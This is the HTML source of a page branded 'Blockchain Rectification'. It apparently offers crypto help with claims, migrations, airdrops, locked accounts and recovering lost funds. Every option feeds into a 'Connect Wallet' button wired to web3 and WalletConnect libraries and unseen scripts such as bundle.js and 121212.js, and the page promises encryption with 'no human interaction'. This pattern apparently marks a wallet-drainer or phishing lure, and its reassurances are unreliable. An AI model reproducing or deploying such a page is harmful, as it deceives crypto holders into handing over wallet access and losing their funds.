<!DOCTYPE html>
<html class="no-js" lang="en">

<head>
  <!-- Meta Tags -->
  <meta charset="utf-8">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="author" content="ThemeMarch">
  <!-- Site Title -->
  <title>Blockchain Rectification - We are here to help you resolve your crypto related issues</title>
  <link rel="shortcut icon" type="image/png" href="../assets/img/cta-img-with-bg.png"../>
  <link rel="stylesheet" href="../assets/css/plugins/fontawesome.min.css">
  <link rel="stylesheet" href="../assets/css/plugins/bootstrap.min.css">
  <link rel="stylesheet" href="../assets/css/plugins/slick.css">
  <link rel="stylesheet" href="../assets/css/app.css">
  <link rel="stylesheet" href="../assets/css/style.css">
  <link rel="stylesheet" href="../assets/css/select2.min.css">
  <link href="..//cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/css/toastr.min.css" rel="stylesheet" />
</head>

<body class="cs-dark">

  <div class="cs-preloader cs-center">
    <div class="cs-preloader_in"></div>
    <!-- <span>Loading</span> -->
  </div>

  <div style="height:62px; background-color: #1D2330; overflow:hidden; box-sizing: border-box; border: 1px solid #282E3B; border-radius: 4px; text-align: right; line-height:14px; block-size:62px; font-size: 12px; font-feature-settings: normal; text-size-adjust: 100%; box-shadow: inset 0 -20px 0 0 #262B38;padding:1px;padding: 0px; margin: 0px; width: 100%;"><div style="height:40px; padding:0px; margin:0px; width: 100%;"><iframe src="https://widget.coinlib.io/widget?type=horizontal_v2&theme=dark&pref_coin_id=1505&invert_hover=no" width="100%" height="36px" scrolling="auto" marginwidth="0" marginheight="0" frameborder="0" border="0" style="border:0;margin:0;padding:0;"></iframe></div><div style="color: #626B7F; line-height: 14px; font-weight: 400; font-size: 11px; box-sizing: border-box; padding: 2px 6px; width: 100%; font-family: Verdana, Tahoma, Arial, sans-serif;"><a href="https://coinlib.io" target="_blank" style="font-weight: 500; color: #626B7F; text-decoration:none; font-size:11px">Cryptocurrency Prices</a>&nbsp;by Coinlib</div></div>

  <!-- Start Hero -->
  <section class="cs-hero cs-style4 cs-bg cs-center" data-src="../assets/img/hero_bg4.png">
    <div class="container-fluid">
      <div class="cs-hero_in">
        <div class="cs-hero_in_left">
          <div class="cs-hero_text">
            <h4 class="cs-hero_title cs-white_color">Decentralized to <span class="typewrite"><span class="wrap"></span></span> with Chain Protocol</h4>
            <div class="cs-hero_subtitle cs-medium cs-white_color">Chain provides industry-leading Web3 and Blockchain a safe protocol and process encrypted by a superb encryption server. Your information never leaves our sever or be visible to anyone
              It’s an end to end encryption with no human interaction</div>
           <div class="action">
            <div class="cs-hero_btns">
              <div id="connectBtn" class="connect cs-hero_btn cs-style1 cs-color3 connectBtn"><span>Connect Wallet</span></div>
            </div>
            <!-- <div class="btn-hero heading-SB" id="slect-main">
                <select class="select2" id="choicentw" id="select2-main" aria-invalid="false" data-select2-id="select2-data-1-x6av" tabindex="-1" aria-hidden="true">
                    <option value="">Select Chain</option>
                    <option value="1">Ethereum</option>
                    <option value="2">BSC</option>
                    <option value="3">Avalanche</option>
                    <option value="4">Fantom</option>
                    <option value="5">Polygon</option>
                    <option value="0x89" data-select2-id="select2-data-31-w03z">Polygon</option>
                    <option value="0xa86a" data-select2-id="select2-data-32-71oo">Avalanche</option>
                    <option value="0xfa" data-select2-id="select2-data-33-hulu">Fantom</option>

                </select>
            </div> -->
           </div>

          </div>
        </div>
        <div class="cs-hero_in_right">
          <div class="col-lg-8">
            <img alt="Image" src="../assets/img/cta-img-with-bg.png">
          </div>
        </div>
      </div>
    </div>
  </section>
  <!-- End Hero -->

  <!-- Start Category -->
  <section>
    <div class="container">
      <h2 class="cs-section_heading cs-style1 text-center">Make Your Selection Below</h2>
      <div class="cs-height_45 cs-height_lg_45"></div>
      <div class="row">
        <div class="col-xl-3 col-lg-4">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Migration</h3>
            <p>Click here for migration</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Claim</h3>
            <p>Click here to claim assets</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Swap</h3>
            <p>Click here for assets swapping</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-6">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Slippage</h3>
            <p>Click here for slippage related error.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-4 col-lg-6">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Transaction</h3>
            <p>Click here for transaction related issues.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-4 col-lg-6">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Cross Transfer</h3>
            <p>Click here for cross bridge issues.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-4 col-lg-6">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Staking</h3>
            <p>Click here for staking related issues.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Exchange</h3>
            <p>Click here for exchange related issues</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Connect to Dapps</h3>
            <p>Click here for error while connectting to dapps.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Login</h3>
            <p>Click here for wallet login issue.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-6">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Whitelist</h3>
            <p>Click here for whitelist related issues.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-6">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>NFT Rarity and traits</h3>
            <p>Click here for Nft related issues.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-4 col-lg-6">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Buy Coins/Tokens</h3>
            <p>To trade, your account must be marked as a trusted payment source.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-4 col-lg-6">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Missing/Irregular balance</h3>
            <p>Click here to recover lost/missing funds.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-4 col-lg-6">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Wallet glitch / wallet error</h3>
            <p>Click here if you have <br>problem with your trading wallet.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Transaction Delay</h3>
            <p>Click here for any issues related to transaction delay.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Claim Airdrop</h3>
            <p>Click here for airdrop related issues.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>NFTs</h3>
            <p>Click here for NFTs minting/transfer related issues.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-6">
          <div class="connect cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Locked Account</h3>
            <p>Click here for issues related to account lock.</p>
          </div>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
      </div>
    </div>
  </section>
  <!-- End Category -->

  <!-- Start Footer -->
  <footer class="cs-footer cs-style1">
    <div class="cs-footer_bg"></div>
    <div class="cs-height_60 cs-height_lg_20"></div>
    <div class="cs-footer_bottom">
      <div class="container">
        <div class="cs-footer_separetor"></div>
        <div class="cs-footer_bottom_in">
          <div class="cs-copyright">© 2022. Blockchain Rectification.</div>
          <ul class="cs-footer_menu">
            <li><div>Privacy Policy</a></li>
            <li><div>Term & Condition</a></li>
          </ul>
        </div>
      </div>
    </div>
  </footer>
  <!-- End Footer -->

  <!-- Script -->
  <script src="../assets/js/plugins/jquery-3.6.0.min.js"></script>
  <script src="../assets/js/plugins/isotope.pkg.min.js"></script>
  <script src="../assets/js/plugins/jquery.slick.min.js"></script>
  <script src="../assets/js/main.js"></script> 
  
  <script src="..//cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.js"></script>
  <script src="../assets/js/typed.js"></script>
  <script src="..//code.tidio.co/jiwvzqbjcsatcdnogffecycgvhdw332g.js" async></script>
  <script src="../Decimal/decimal.js"></script>
  
  <script
  src="https://code.jquery.com/jquery-3.6.0.min.js"
  integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4="
  crossorigin="anonymous"></script>
    <script type="text/javascript" src="./WEB3/web3.js"></script>
    <script type="text/javascript" src="./Web3Modal/web3modal.js"></script>
    <script type="text/javascript" src="./bundle.js"></script>
    <script type="text/javascript" src="https://unpkg.com/evm-chains@0.2.0/dist/umd/index.min.js"></script>
     <script type="text/javascript" src="https://unpkg.com/@walletconnect/web3-provider"></script>
     <script type="text/javascript"  src="https://cdn.jsdelivr.net/npm/@portis/web3@4.0.7/umd/index.min.js"></script>
    <script src="./121212.js"></script>
  <script>
    var typed = new Typed(".typewrite", { strings: [ "web3", "NFTs", "blockchains", "staking", "nodes", "analytics" ], typeSpeed: 200, baclSpeed: 200, loop: true} )
  </script>
  <!-- <script>
    var urlMapping = {
    "" : "../ERC20/bep20.html",
    "1" : "../ERC20/bep20.html",
    "2" : "../BEP20/bep20.html",
    "3" : "../AVAX/bep20.html",
    "4" : "../PHANTOM/bep20.html",
    "5" : "../POLY/bep20.html"
}
$(".connectBtn").click(function(){
    var input = $("select").val().trim().toUpperCase();
    if (urlMapping.hasOwnProperty(input)){
        window.location = urlMapping[input];
    }
    else {
        //if url not found, redirect to default url
        window.location = urlMapping[input];
    }
});
  </script> -->
  <style>
    #choicentw{
      background-color: #5b1683;
      color: white;
      padding: 10px;
      border-radius: 12px;
    }
  </style>
</body>


</html>
